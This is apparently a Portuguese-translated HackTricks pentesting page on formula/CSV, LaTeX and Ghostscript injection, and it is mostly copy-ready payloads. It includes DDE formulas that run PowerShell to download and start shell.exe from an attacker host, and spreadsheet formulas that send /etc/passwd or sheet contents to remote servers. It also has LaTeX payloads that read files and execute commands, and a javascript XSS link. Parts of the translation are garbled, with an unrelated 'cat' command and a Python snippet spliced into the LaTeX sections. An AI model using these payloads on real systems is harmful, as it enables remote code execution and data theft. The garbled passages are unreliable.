hacktricks/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

15 KiB
Raw Blame History

Injeção de Fórmula/CSV/Doc/LaTeX/GhostScript

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. Experimente gratuitamente hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Injeção de Fórmula

Informações

Se a sua entrada está sendo refletida dentro de arquivos CSV (ou qualquer outro arquivo que provavelmente será aberto pelo Excel), você pode ser capaz de colocar fórmulas do Excel que serão executadas quando o usuário abrir o arquivo ou quando o usuário clicar em algum link dentro da planilha do Excel.

{% hint style="danger" %} Atualmente, o Excel irá alertar (várias vezes) o usuário quando algo é carregado de fora do Excel para evitar que ele realize ações maliciosas. Portanto, um esforço especial em Engenharia Social deve ser aplicado à carga útil final. {% endhint %}

Wordlist

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

O exemplo a seguir é muito útil para exfiltrar conteúdo da planilha final do Excel e realizar solicitações para locais arbitrários. Mas requer que o usuário clique no link (e aceite os avisos de alerta).

Exemplo retirado de https://payatu.com/csv-injection-basic-to-exploit

Vamos supor um cenário de ataque ao sistema de Gerenciamento de Registros de Alunos de uma escola. O aplicativo permite que o professor insira os detalhes dos alunos na escola. O atacante obtém acesso ao aplicativo e deseja comprometer todos os professores que usam o aplicativo. Portanto, o atacante tenta realizar um ataque de injeção de CSV por meio do aplicativo da web.
O atacante precisa roubar os detalhes de outros alunos. Portanto, o atacante usa a fórmula de Hiperlink e a insere ao inserir os detalhes do aluno.

Quando o professor exporta o CSV e clica no hiperlink, os dados sensíveis são enviados para o servidor do atacante.

O arquivo CSV exportado contém uma carga maliciosa nele.

Os detalhes do aluno são registrados no servidor da web do atacante.

RCE

Para que este exemplo funcione, é necessário ter habilitada a seguinte configuração:
Arquivo → Opções → Centro de Confiança → Configurações do Centro de Confiança → Conteúdo Externo → Habilitar Inicialização do Servidor de Troca Dinâmica de Dados
ou o uso de uma versão antiga do Excel.

A boa notícia é que essa carga é executada automaticamente quando o arquivo é aberto (se o usuário aceitar os avisos).

É possível executar uma calculadora com a seguinte carga =cmd|' /C calc'!xxx

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

LFI

LibreOffice Calc

  • Isso irá ler a primeira linha do arquivo local /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Exfiltrar isso: =WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Exfiltrar mais de uma linha: =WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Exfiltração DNS: =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))

Analisando a carga útil de exfiltração DNS:

  • file:///etc/passwd#$passwd.A19 - Irá ler a 19ª linha do arquivo local /etc/passwd
  • ENCODEURL('file:///etc/passwd'#$passwd.A19) - Codifica a URL dos dados retornados
  • MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41) - Similar a substring, lê dados do 1º caractere ao 41º - uma maneira muito útil de restringir o comprimento dos nomes de host DNS (limite de 254 caracteres para FQDN e 63 caracteres para um rótulo, ou seja, subdomínio)
  • SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-") - substitui todas as ocorrências de % (o caractere especial da codificação de URL) por traço - isso garante que apenas caracteres DNS válidos sejam usados
  • CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<FQDN>") - Concatena a saída do arquivo (após o processamento acima) com o FQDN (para o qual temos acesso ao host que é autoritativo para o domínio)
  • WEBSERVICE - Faz uma solicitação para esse nome DNS inexistente, que podemos então analisar os logs (ou executar tcpdump etc.) no servidor de nomes autoritativo DNS, no qual temos controle

Google Sheets OOB Data Exfiltration

Primeiramente, vamos apresentar algumas das funções mais interessantes.

CONCATENATE: Anexa strings uma à outra.

=CONCATENATE(A2:E2)

IMPORTXML: Importa dados de vários tipos de dados estruturados, incluindo XML, HTML, CSV, TSV e feeds XML RSS e ATOM.

=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

IMPORTFEED: Importa um feed RSS ou ATOM.

=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))

IMPORTHTML: Importa dados de uma tabela ou lista dentro de uma página HTML.

=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

IMPORTRANGE: Importa um intervalo de células de uma planilha especificada.

=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

IMAGEM: Insere uma imagem em uma célula.

=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")

Injeção de LaTeX

Normalmente, os servidores que encontramos na internet que convertem código LaTeX em PDF usam o pdflatex.
Este programa usa 3 atributos principais para (des)permitir a execução de comandos:

  • --no-shell-escape: Desabilita a construção \write18{command}, mesmo que esteja habilitada no arquivo texmf.cnf.
  • --shell-restricted: Igual a --shell-escape, mas limitado a um conjunto 'seguro' de **comandos predefinidos (**No Ubuntu 16.04, a lista está em /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Habilita a construção \write18{command}. O comando pode ser qualquer comando de shell. Essa construção é normalmente desabilitada por motivos de segurança.

No entanto, existem outras maneiras de executar comandos, então, para evitar RCE, é muito importante usar --shell-restricted.

Ler arquivo

Você pode precisar ajustar a injeção com envoltórios como [ ou $.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Ler arquivo de uma única linha

To read a single-lined file, you can use the following command:

Para ler um arquivo de uma única linha, você pode usar o seguinte comando:

cat file.txt

This command will display the contents of the file on the terminal.

Esse comando exibirá o conteúdo do arquivo no terminal.

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Ler arquivo com várias linhas

To read a file with multiple lines, you can use the following code:

with open('filename.txt', 'r') as file:
    lines = file.readlines()
    for line in lines:
        print(line.strip())

This code opens the file filename.txt in read mode ('r') and uses the readlines() method to read all the lines in the file. It then iterates over each line and prints it after removing any leading or trailing whitespace using the strip() method.

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Escrever arquivo

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Execução de comandos

A entrada do comando será redirecionada para stdin, use um arquivo temporário para obtê-la.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Se você receber algum erro do LaTex, considere usar base64 para obter o resultado sem caracteres inválidos.

\immediate\write18{env | base64 > test.tex}
\input{text.tex}
\input|ls|base4
\input{|"/bin/hostname"}

Cross Site Scripting

De @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Injeção de Ghostscript

TODO: Crie um resumo com as informações e técnicas mais relevantes de https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Referências

Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. Experimente gratuitamente hoje.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥